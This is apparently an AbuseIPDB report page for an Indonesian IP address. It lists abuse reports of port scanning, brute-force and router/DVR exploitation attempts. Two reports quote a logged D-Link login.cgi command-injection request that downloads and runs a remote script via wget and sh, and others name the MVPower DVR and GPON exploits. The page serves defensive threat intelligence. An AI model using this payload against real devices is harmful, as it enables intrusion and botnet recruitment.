JavaScript is disabled. Some features of this site may not work properly. For a smoother experience, please enable JavaScript in your browser settings.

AbuseIPDB » 103.191.165.164

103.191.165.164 was found in our database!

This IP was reported 19 times. Confidence of Abuse is 56%: ?

56%

ISP	PT Sakti Wijaya Network
Usage Type	Fixed Line ISP
ASN	AS149925
Domain Name	swnetwork.id
Country	🇮🇩 Indonesia
City	Subang, West Java

IP info including ISP, Usage Type, and Location provided by IPInfo. Updated weekly.

Report 103.191.165.164

Whois 103.191.165.164

IP Abuse Reports for 103.191.165.164:

This IP address has been reported a total of 19 times from 16 distinct sources. 103.191.165.164 was first reported on January 8th 2026, and the most recent report was 2 weeks ago.

Old Reports: The most recent abuse report for this IP address is from 2 weeks ago . It is possible that this IP is no longer involved in abusive activities.

Reporter	IoA Timestamp (UTC)	Comment	Categories
🇮🇩 soc-yk	2026-06-10 14:42:11 (2 weeks ago)	Type: suspicious_network_activity Risk: 79 Events: 589 Evidence: - Persistent suspicious network ac ... show more Type: suspicious_network_activity Risk: 79 Events: 589 Evidence: - Persistent suspicious network activity detected - Repeated hostile operational behavior observed - Multi-event operational persistence identified show less	Port Scan Hacking
🇮🇩 soc-yk	2026-06-08 13:06:12 (2 weeks ago)	Type: suspicious_network_activity Risk: 85 Events: 267 Evidence: - Persistent suspicious network ac ... show more Type: suspicious_network_activity Risk: 85 Events: 267 Evidence: - Persistent suspicious network activity detected - Repeated hostile operational behavior observed - Multi-event operational persistence identified - Threat escalation behavior observed show less	Port Scan Hacking
🇫🇷 SpaceHost-Server	2026-06-05 22:25:15 (2 weeks ago)		Brute-Force Web App Attack
🇸🇪 peterh	2026-06-05 12:09:00 (2 weeks ago)	103.191.165.164 - - [05/Jun/2026:11:17:20 +0200] "GET /login.cgi?cli=aa%20aa%27;wge t%20http://140. ... show more 103.191.165.164 - - [05/Jun/2026:11:17:20 +0200] "GET /login.cgi?cli=aa%20aa%27;wge t%20http://140.233.190.47/dlink%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 40 0 226 "-" "terrabot-owned-you" show less	Bad Web Bot Web App Attack Hacking
🇧🇪 loloji	2026-06-05 06:58:37 (2 weeks ago)	Malformed HTTP requests (scanning/probing) detected by Fail2Ban [jail: nginx-bad-request]. Origin: S ... show more Malformed HTTP requests (scanning/probing) detected by Fail2Ban [jail: nginx-bad-request]. Origin: Subang, Indonesia (PT Sakti Wijaya Network). show less	Brute-Force Web App Attack
🇭🇺 bcsaba	2026-06-05 03:24:02 (2 weeks ago)	Suricata: Alert - ET EXPLOIT D-Link DSL-2750B - OS Command Injection	Web App Attack
🇮🇩 securejdprop	2026-06-05 00:22:47 (3 weeks ago)	This IP was detected by CrowdSec triggering crowdsecurity/suricata-major-severity(ET WEB_SPECIFIC_AP ... show more This IP was detected by CrowdSec triggering crowdsecurity/suricata-major-severity(ET WEB_SPECIFIC_APPS MVPower CCTV DVR /shell JAWS Webserver Unauthenticated Remote Command Execution (CVE-2016-20016)). Ip 103.191.165.164 performed 'crowdsecurity/suricata-major-severity' (1 events over 0s) at 2026-06-05 00:22:45.967322456 +0000 UTC show less	Hacking Web App Attack
🇫🇷 SpaceHost-Server	2026-06-04 22:25:14 (3 weeks ago)		Brute-Force Web App Attack
🇺🇸 NXTwoThou	2026-06-04 21:10:00 (3 weeks ago)	/login.cgi%3Fcli=aa%20aa%27;wget%20http://140.233.190.47/dlink%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27 ... show more /login.cgi%3Fcli=aa%20aa%27;wget%20http://140.233.190.47/dlink%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ show less	Web App Attack
🇫🇷 Version Net	2026-06-04 20:08:40 (3 weeks ago)	IPS Detection: JAWS.DVR.CCTV.Shell.Unauthenticated.Command.Execution	Hacking
🇫🇷 Hiigara	2026-06-04 20:00:37 (3 weeks ago)	connection attempt : 103.191.165.164 on port : tcp/8080 (HTTP-alt)	Port Scan
🇮🇪 RoboSOC	2026-06-04 12:31:11 (3 weeks ago)	MVPower DVR Shell Unauthenticated Command Execution Vulnerability, PTR: PTR record not found	Hacking
Anonymous	2026-06-04 08:41:26 (3 weeks ago)	"POST /GponForm/diag_Form?images/ HTTP/1.1"	Hacking Web App Attack
Anonymous	2026-06-04 04:53:21 (3 weeks ago)	Fail2Ban triggered	Web App Attack
🇯🇵 VXG-NET	2026-06-04 04:42:39 (3 weeks ago)	port=80, indicator_type=code-execution	Hacking

Showing 1 to 15 of 19 reports

Think this IP has been falsely reported? You may request to have the associated reports reviewed and removed. Request Takedown 🚩

Recently Reported IPs:

🇺🇸 153.66.28.132

🇳🇱 77.83.39.14

🇹🇼 198.235.24.94

🇨🇴 181.129.94.58

🇺🇸 162.216.149.65

🇺🇸 147.185.132.45

🇨🇿 143.244.58.247

🇷🇺 83.171.110.227

🇺🇸 74.125.75.155

🇺🇸 66.132.172.156

🇳🇱 46.151.178.13

🇹🇼 35.201.140.251

🇮🇩 34.50.92.120

🇬🇧 195.206.182.214

🇻🇳 171.244.63.18

🇺🇸 162.216.149.75

🇬🇧 87.236.176.105

🇺🇸 64.62.197.96

🇮🇩 36.95.14.145

🇯🇵 35.77.118.165